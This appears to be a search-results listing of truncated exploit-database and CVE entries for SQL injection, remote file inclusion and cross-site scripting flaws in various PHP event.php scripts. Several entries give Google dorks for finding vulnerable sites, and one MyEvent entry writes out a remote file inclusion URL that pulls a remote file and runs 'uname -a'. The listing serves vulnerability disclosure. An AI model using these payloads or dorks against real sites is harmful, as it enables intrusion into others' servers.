360ideas SQL Injection

Exploit Title: 360ideas Sql Injection Vulnerability Date: 30/10/2011 - 22:40 Author: 3spi0n Software Website: http://www.360ideas.com/ Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Vulnerable File: Event.php and other .php files. $ Dorks: "Site by 360ideas.com" $ Demo Sites:...

Attraction Website Design SQL Injection

Exploit Title: Attraction Website Design Sql Injection Vulnerability Date: 30/10/2011 - 22:45 Author: 3spi0n Software Website: http://www.attractweb.com/index.php Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Vulnerable File: Event.php and other .php files. $ Dorks: "Site by Attraction...

Tap In Solutions Blind SQL Injection

========================================================================== Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability Date: 17.10.2011 Author: poach3r Software Link: http://www.tapinsolutionsinc.com/ Tested on: Windows XP SP3 Google Dork: inurl:event.php?eventid= powered by...

Datenator 0.3.0 (event.php id) SQL Injection

Exploit for unknown platform in category web applications ============================================ Datenator 0.3.0 event.php id SQL Injection ============================================ Exploit Title: Datenator 0.3.0 event.php id SQL Injection Date: 26.12.09 Author: TheHuliGun Look on code i...

Datenator 0.3.0 - event.php?id SQL Injection

Datenator 0.3.0 - event.php?id SQL Injection Exploit Title: Datenator 0.3.0 event.php id SQL Injection Date: 26.12.09 Author: TheHuliGun Look on code in event.php: 22: ifisset$GET'id' 23: 24: $event = $datenator-readeventinfo$GET'id'; Function readeventinfo is in file includes/functions.php 412:...

Datenator 0.3.0 (event.php id) SQL Injection

No description provided by source. Exploit Title: Datenator 0.3.0 event.php id SQL Injection Date: 26.12.09 Author: TheHuliGun Look on code in event.php: 22: ifisset$GET'id' 23: 24: $event = $datenator-readeventinfo$GET'id'; Function readeventinfo is in file includes/functions.php 412: function...

Datenator 0.3.0 - 'event.php?id' SQL Injection

Exploit Title: Datenator 0.3.0 event.php id SQL Injection Date: 26.12.09 Author: TheHuliGun Look on code in event.php: 22: ifisset$GET'id' 23: 24: $event = $datenator-readeventinfo$GET'id'; Function readeventinfo is in file includes/functions.php 412: function readeventinfo$eventid 413: 414: $sql...

CVE-2008-6464

SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter...

Campsite 2.6.1 - Event.php?g_documentRoot Remote File Inclusion

Campsite 2.6.1 - Event.php?gdocumentRoot Remote File Inclusion source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects...

Chaussette远程文件包含漏洞

Chaussette是一款基于PHP的WEB应用程序。 Chaussette不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是多个脚本对用户提交的'BASE'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Chaussette http://freshmeat.net/redir/chaussette/64502/urlzip/chaussette.zip...

Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities

No description provided by source. Chaussette Remote File Inclusion CreW: ToXiC Bug Found By Drago84 Source Code: http://freshmeat.net/redir/chaussette/64502/urlzip/chaussette.zip Page Affect /Classes/Evenement.php /Classes/Event.php /Classes/Eventformonth.php /Classes/Eventformonthperday.php...

Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ================================================================ Chaussette = 080706 BASE Remote File Include Vulnerabilities ================================================================ Chaussette Remote File Inclusion CreW: ToXiC Bug...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in phpCommunityCalendar 4.0.3 allow remote attackers to inject arbitrary web script or HTML via the 1 LoName parameter in a week.php and b month.php and 2 AddressLink parameter in c event.php...

CVE-2006-2798

Multiple cross-site scripting XSS vulnerabilities in phpCommunityCalendar 4.0.3 allow remote attackers to inject arbitrary web script or HTML via the 1 LoName parameter in a week.php and b month.php and 2 AddressLink parameter in c event.php...

MyEvent Remote File Execution And XSS Attacking

Website : http://mywebland.com/ Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php" I. Remote Code Execution This is script to very big high it bug being found...

MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================= MyEvent = 1.3 myeventpath Remote File Inclusion Vulnerability ================================================================= Script : MyEvent Version : 1.2 Risk : High...

MyEvent 1.3 - event.php Remote File Inclusion

MyEvent 1.3 - event.php Remote File Inclusion Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php"...

MyEvent 1.3 - &#039;event.php&#039; Remote File Inclusion

Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php" http://www.site.com/path/event.php?myeventpath=http://www.site.com/x.txt?&cmd=uname -a milw0rm.com 2006-04-17...

CVE-2005-2882

Multiple cross-site scripting XSS vulnerabilities in phpCommunityCalendar 4.0.3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the LocationID parameter to 1 thankyou.php or 2 day.php, font parameter to 3 calDaily.php, 4 calMonthly.php, 5...